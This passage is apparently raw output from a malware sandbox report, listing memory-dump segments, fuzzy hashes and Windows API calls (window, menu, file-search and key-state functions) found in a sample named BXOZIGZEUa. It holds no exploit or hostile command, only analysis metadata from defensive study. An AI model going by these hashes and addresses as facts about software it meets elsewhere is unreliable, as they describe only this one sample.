                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$Exception@8Throw
                                                                  • String ID:
                                                                  • API String ID: 2489616738-0
                                                                  • Opcode ID: 724dbca499fb502eb7e1729cfd44456eff0f191d1e2c5d9b60cfecba4c84da80
                                                                  • Instruction ID: ab49b08318ab1c6d5dee35a86e1075c042fdb0dd08f8032699d025b968cb248b
                                                                  • Opcode Fuzzy Hash: 724dbca499fb502eb7e1729cfd44456eff0f191d1e2c5d9b60cfecba4c84da80
                                                                  • Instruction Fuzzy Hash: BB018F74600202FBDF26AF25C852B7D36A6BF60361F19412EE8918B391EF74CD50DB54
                                                                  APIs
                                                                  • FindResourceW.KERNELBASE(?,?,00000006,00000104,001CA1B8,?,001CADE8,?,?,?,00000000,?,001CA1B8,0000E000,?,00000100), ref: 001C8798
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FindResource
                                                                  • String ID:
                                                                  • API String ID: 1635176832-0
                                                                  • Opcode ID: 83805f69686c83fb041de033db40d747fc3231e157fa4dcb7b17fc8432099a3b
                                                                  • Instruction ID: b27f2ee33097bddf61b41bf0f318e407aece2f714742c028300f1255672bcca7
                                                                  • Opcode Fuzzy Hash: 83805f69686c83fb041de033db40d747fc3231e157fa4dcb7b17fc8432099a3b
                                                                  • Instruction Fuzzy Hash: A6E0CD2630011437D510154EBC85EFB775CCBD16B6B00403BFD4DDB140E661EC1151F0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc
                                                                  • String ID:
                                                                  • API String ID: 1579825452-0
                                                                  • Opcode ID: fe189ec788af057dcd4b1ff232a28fefe3e0e8550917db351e345314bec743c0
                                                                  • Instruction ID: 68b4eef22eaf2a222ec60ec763cb783524c252eeb81ae5fd53f2474f4f632717
                                                                  • Opcode Fuzzy Hash: fe189ec788af057dcd4b1ff232a28fefe3e0e8550917db351e345314bec743c0
                                                                  • Instruction Fuzzy Hash: 9FE0927351061A6BC7019F59D404F8AFBECDFA1374F56C46EE804CB252C7B1E8048BA0
                                                                  APIs
                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,001C1C42,?,00000000,*.*,00000003,?,00000001,6B722804,?,?,00000000), ref: 001CB3EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindNext
                                                                  • String ID:
                                                                  • API String ID: 2029273394-0
                                                                  • Opcode ID: cdac9f415dab30637706e40cc3b2b74fe6c964bd65d8ea884bf5534d602bf8fa
                                                                  • Instruction ID: eb088e0dabe7db4c2963a80aab4e108c2edda15d4b3a3fd0fb3b2cfe80a2f495
                                                                  • Opcode Fuzzy Hash: cdac9f415dab30637706e40cc3b2b74fe6c964bd65d8ea884bf5534d602bf8fa
                                                                  • Instruction Fuzzy Hash: 0DE0ED31504B50DFDB609B69F984B53B7E4EB98B21F11C82EE4AEC3A54D770E8408A10
                                                                  APIs
                                                                    • Part of subcall function 001DE769: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 001DE79C
                                                                    • Part of subcall function 001DE769: _memset.LIBCMT ref: 001DE7B5
                                                                  • SystemParametersInfoW.USER32(00000029,?,?,00000000), ref: 001CD0C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressInfoParametersProcSystem_memset
                                                                  • String ID:
                                                                  • API String ID: 831922234-0
                                                                  • Opcode ID: 747fc92d01f7a6b2dec8e9b6e1a6fb956c4811eea979f7a5b887e964bfb01bcc
                                                                  • Instruction ID: 5f8fa48cbf69a6d05bac001ce148db6a0ee69627127bccec96dc39d5a3698f7b
                                                                  • Opcode Fuzzy Hash: 747fc92d01f7a6b2dec8e9b6e1a6fb956c4811eea979f7a5b887e964bfb01bcc
                                                                  • Instruction Fuzzy Hash: CCD013711803046FD7515B44DC45F663B59D794715F500425F90D9F151CBB6EC50C656
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 001D0645
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 1531683806-0
                                                                  • Opcode ID: 00e9eceb773ac39765e8e81376fee46a10102ad7475b39642ce287fa4bd7f41e
                                                                  • Instruction ID: 7027a8267adda89ef882e0a354609c24fa9c64b45ec692b88046d0e5d1609330
                                                                  • Opcode Fuzzy Hash: 00e9eceb773ac39765e8e81376fee46a10102ad7475b39642ce287fa4bd7f41e
                                                                  • Instruction Fuzzy Hash: EAB01270C46110EEDF01A730DD4C31636647BE4307F1488D9F009CA101DF79C012C554
                                                                  APIs
                                                                  • IsWindow.USER32(?), ref: 0020CF6A
                                                                  • IsWindow.USER32(?), ref: 0020CF7F
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 0020CFF0
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 0020CFF7
                                                                  • CopyRect.USER32(?,?), ref: 0020D009
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0020D019
                                                                  • GetSystemMetrics.USER32(00000033), ref: 0020D19D
                                                                  • GetSystemMetrics.USER32(00000006), ref: 0020D1A3
                                                                  • SendMessageW.USER32(?,00000401,00000001,00000000), ref: 0020D228
                                                                  • SendMessageW.USER32(?,00000418,00000000,FFFFFFFF), ref: 0020D242
                                                                  • SetRectEmpty.USER32(?), ref: 0020D4A5
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0020D50E
                                                                  • GetWindowRect.USER32(?,?), ref: 0020D5F1
                                                                  • ClientToScreen.USER32(?,?), ref: 0020D83C
                                                                  • ClientToScreen.USER32(?,?), ref: 0020D863
                                                                  • ClientToScreen.USER32(?,?), ref: 0020D9FC
                                                                  • ClientToScreen.USER32(?,?), ref: 0020DA24
                                                                  • GetSystemMetrics.USER32(00000002), ref: 0020DABF
                                                                  • IsRectEmpty.USER32(?), ref: 0020DACF
                                                                  • GetSystemMetrics.USER32(00000002), ref: 0020DADB
                                                                  • GetWindowRect.USER32(?,?), ref: 0020DBDB
                                                                  • IntersectRect.USER32(?,?,-00000054), ref: 0020DC3C
                                                                  • InvalidateRect.USER32(?,-00000054,00000001), ref: 0020DC51
                                                                  • UpdateWindow.USER32(?), ref: 0020DC5A
                                                                  • IntersectRect.USER32(?,?,-00000054), ref: 0020DCA3
                                                                  • InvalidateRect.USER32(?,-00000054,00000001), ref: 0020DCB8
                                                                  • UpdateWindow.USER32(?), ref: 0020DCC1
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,?,?,?,?,00000014,00000000), ref: 0020DCFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$System$ClientMetricsScreen$EmptyInfoIntersectInvalidateMessageMonitorRedrawSendUpdate$CopyFromParametersPoint
                                                                  • String ID: ($(/
                                                                  • API String ID: 840757265-698097623
                                                                  • Opcode ID: b14155a99561267887fd13dd4720f4bb1a805b84e44eea7acbde0038ac9d95ba
                                                                  • Instruction ID: c670d1886a15d86d7790f555d03b8d1a6bd5d0c5d75a63e7ad01e32449bbe949
                                                                  • Opcode Fuzzy Hash: b14155a99561267887fd13dd4720f4bb1a805b84e44eea7acbde0038ac9d95ba
                                                                  • Instruction Fuzzy Hash: 8FA22B71A11219CFCF15CFA8C984BEDB7B5BF48304F1841BAE849AB296DB70A951CF50
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00213A73
                                                                  • GetWindowRect.USER32(?,?), ref: 00213A96
                                                                  • PtInRect.USER32(?,?,?), ref: 00213AA4
                                                                    • Part of subcall function 00220419: RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00220490
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00213AC9
                                                                  • ScreenToClient.USER32(?,?), ref: 00213B17
                                                                  • IsWindow.USER32(?), ref: 00213B5E
                                                                  • IsWindow.USER32(?), ref: 00213BA1
                                                                  • GetWindowRect.USER32(?,?), ref: 00213BC1
                                                                  • PtInRect.USER32(?,?,?), ref: 00213BD1
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00213C06
                                                                  • PtInRect.USER32(-00000054,?,?), ref: 00213C51
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00213C76
                                                                  • ScreenToClient.USER32(?,?), ref: 00213CCE
                                                                  • PtInRect.USER32(?,?,?), ref: 00213CDE
                                                                  • GetParent.USER32(?), ref: 00213D68
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00213DFB
                                                                  • GetFocus.USER32 ref: 00213E01
                                                                  • WindowFromPoint.USER32(?,?,00000000), ref: 00213E39
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00213E83
                                                                  • GetSystemMenu.USER32(?,00000000,?,?,7608A000,?), ref: 00213F0C
                                                                  • IsMenu.USER32(?), ref: 00213F2E
                                                                  • EnableMenuItem.USER32(?,0000F030,00000000), ref: 00213F4B
                                                                  • EnableMenuItem.USER32(?,0000F120,00000000), ref: 00213F56
                                                                  • IsZoomed.USER32(?), ref: 00213F64
                                                                  • IsIconic.USER32(?), ref: 00213F83
                                                                  • EnableMenuItem.USER32(?,0000F120,00000003), ref: 00213F97
                                                                  • TrackPopupMenu.USER32(?,00000100,?,?,00000000,?,00000000), ref: 00213FBF
                                                                  • SendMessageW.USER32(?,00000112,00000000,00000000), ref: 00213FD9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MenuRect$MessageSend$EnableItem$ClientScreen$AsyncFocusFromIconicParentPointPopupRedrawStateSystemTrackVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 3398603409-0
                                                                  • Opcode ID: 6e209e865248eafcd8a4c5568b72a63cc8f765b9c44ec34d45a7525fcc2c667b
                                                                  • Instruction ID: 320ca14612a02063e8e17d516bdb431fece51bed058b0ba1e89b51c194d1266b
                                                                  • Opcode Fuzzy Hash: 6e209e865248eafcd8a4c5568b72a63cc8f765b9c44ec34d45a7525fcc2c667b
                                                                  • Instruction Fuzzy Hash: 65F14B75A1020AAFDB21DFA4D885AEEB7FAFF18300F154529F545E7260DB319E90CB50
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00250844
                                                                    • Part of subcall function 00233605: FillRect.USER32(?,00000020), ref: 00233619
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FillH_prolog3Rect
                                                                  • String ID: d
                                                                  • API String ID: 1863035756-2564639436
                                                                  • Opcode ID: f04117c788012b6c3a26192b36e9f8113f9183e98894e41476cf90bc779094cc
                                                                  • Instruction ID: 9ba574d2008e4efb5db0338aed258c35f6402e5ca49ddcfd5df513b7466d8940
                                                                  • Opcode Fuzzy Hash: f04117c788012b6c3a26192b36e9f8113f9183e98894e41476cf90bc779094cc
                                                                  • Instruction Fuzzy Hash: 53C1DD7192021A9FCF04DFA8CCD59EEBBB4EF08315F10052AF951A6291C734D969DBA4
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 00200A2B
                                                                  • IsRectEmpty.USER32(?), ref: 00200A35
                                                                  • IsIconic.USER32(?), ref: 00200A90
                                                                  • BeginDeferWindowPos.USER32(00000000), ref: 00200ACA
                                                                  • GetClientRect.USER32(?,?), ref: 00200AF4
                                                                  • IsRectEmpty.USER32(?), ref: 00200AFE
                                                                  • IsRectEmpty.USER32(?), ref: 00200B94
                                                                  • EqualRect.USER32(?,?), ref: 00200BD9
                                                                  • GetParent.USER32(?), ref: 00200DD5
                                                                  • GetWindowRect.USER32(?,?), ref: 00200C80
                                                                    • Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D012C
                                                                    • Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D0139
                                                                  • EndDeferWindowPos.USER32(?), ref: 00200EC1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$EmptyWindow$DeferScreen$BeginEqualIconicParent
                                                                  • String ID: D2$X/
                                                                  • API String ID: 3453398311-14103545
                                                                  • Opcode ID: 6e42cfa8aa24f850bd7bd2151fdb5bc22c87b3334d6244ce824739d69511f625
                                                                  • Instruction ID: 1820876d1af23cb8b133892634194c8a3e51cdb4fab2387638e45c5c788acecc
                                                                  • Opcode Fuzzy Hash: 6e42cfa8aa24f850bd7bd2151fdb5bc22c87b3334d6244ce824739d69511f625
                                                                  • Instruction Fuzzy Hash: 11F17A31A1030A9FEF15DFA4D9C4BEEB7B6BF59304F140469E806AB296DB70AD15CB10
                                                                  APIs
                                                                  • IsWindow.USER32(?), ref: 001E502D
                                                                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 001E5049
                                                                  • GetCapture.USER32 ref: 001E50C3
                                                                  • GetKeyState.USER32(00000011), ref: 001E5125
                                                                  • GetKeyState.USER32(00000010), ref: 001E5132
                                                                  • ImmGetContext.IMM32(?), ref: 001E5140
                                                                  • ImmGetOpenStatus.IMM32(00000000,?), ref: 001E514D
                                                                  • ImmReleaseContext.IMM32(?,00000000,?), ref: 001E516F
                                                                  • GetFocus.USER32 ref: 001E5199
                                                                  • IsWindow.USER32(?), ref: 001E51DA
                                                                  • IsWindow.USER32(?), ref: 001E5260
                                                                  • ClientToScreen.USER32(?,?), ref: 001E5270
                                                                  • IsWindow.USER32(?), ref: 001E5296
                                                                  • ClientToScreen.USER32(?,?), ref: 001E52C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
                                                                  • String ID:
                                                                  • API String ID: 1155058817-0
                                                                  • Opcode ID: d34629335b4ee940ce5c5955a23275e54ad694c2a7bf8c52d6d736dcabcb2b88
                                                                  • Instruction ID: d4a6cd0ef7e89a4aee0da8f8f419b125296b3f8fa610f9ce584fe7688703ec35
                                                                  • Opcode Fuzzy Hash: d34629335b4ee940ce5c5955a23275e54ad694c2a7bf8c52d6d736dcabcb2b88
                                                                  • Instruction Fuzzy Hash: 99A1A131500E86EFDF289FA6D884ABEB7A6FF14348F104529F596D61A1DB31D890DB40
                                                                  APIs
                                                                  • IsWindow.USER32(?), ref: 001E316D
                                                                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 001E3189
                                                                  • GetCapture.USER32 ref: 001E3209
                                                                  • GetKeyState.USER32(00000011), ref: 001E325C
                                                                  • GetKeyState.USER32(00000010), ref: 001E3269
                                                                  • ImmGetContext.IMM32(?), ref: 001E3277
                                                                  • ImmGetOpenStatus.IMM32(00000000,?), ref: 001E3284
                                                                  • ImmReleaseContext.IMM32(00000000,00000000,?), ref: 001E32A6
                                                                  • GetFocus.USER32 ref: 001E32D0
                                                                  • IsWindow.USER32(?), ref: 001E3311
                                                                  • IsWindow.USER32(?), ref: 001E3397
                                                                  • ClientToScreen.USER32(?,?), ref: 001E33A7
                                                                  • IsWindow.USER32(?), ref: 001E33CD
                                                                  • ClientToScreen.USER32(?,?), ref: 001E33FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
                                                                  • String ID:
                                                                  • API String ID: 1155058817-0
                                                                  • Opcode ID: cdba20ff8340c235bc019e290f57a87c43055c9113a27a2b9182336fc6aa42bb
                                                                  • Instruction ID: 2eb8f6ba0162ea875c7dddc82ba0f9338e549f8075622b897ef2aef627f7b094
                                                                  • Opcode Fuzzy Hash: cdba20ff8340c235bc019e290f57a87c43055c9113a27a2b9182336fc6aa42bb
                                                                  • Instruction Fuzzy Hash: F691C171600A86EFDF259BA2C8C8A7EB7A9FF14301F10852DF5A697161DB31DE91DB00
                                                                  APIs
                                                                  • SetRectEmpty.USER32(?), ref: 001EB7AD
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 001EB7CB
                                                                  • ReleaseCapture.USER32 ref: 001EB7D1
                                                                  • SetCapture.USER32(?), ref: 001EB7E4
                                                                  • ReleaseCapture.USER32 ref: 001EB859
                                                                  • SetCapture.USER32(?), ref: 001EB86C
                                                                  • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 001EB945
                                                                  • UpdateWindow.USER32(?), ref: 001EB9A8
                                                                  • SendMessageW.USER32(?,00000111,000000FF,00000000), ref: 001EB9F0
                                                                  • IsWindow.USER32(?), ref: 001EB9FB
                                                                  • IsIconic.USER32(?), ref: 001EBA08
                                                                  • IsZoomed.USER32(?), ref: 001EBA15
                                                                  • IsWindow.USER32(?), ref: 001EBA29
                                                                  • UpdateWindow.USER32(?), ref: 001EBA75
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
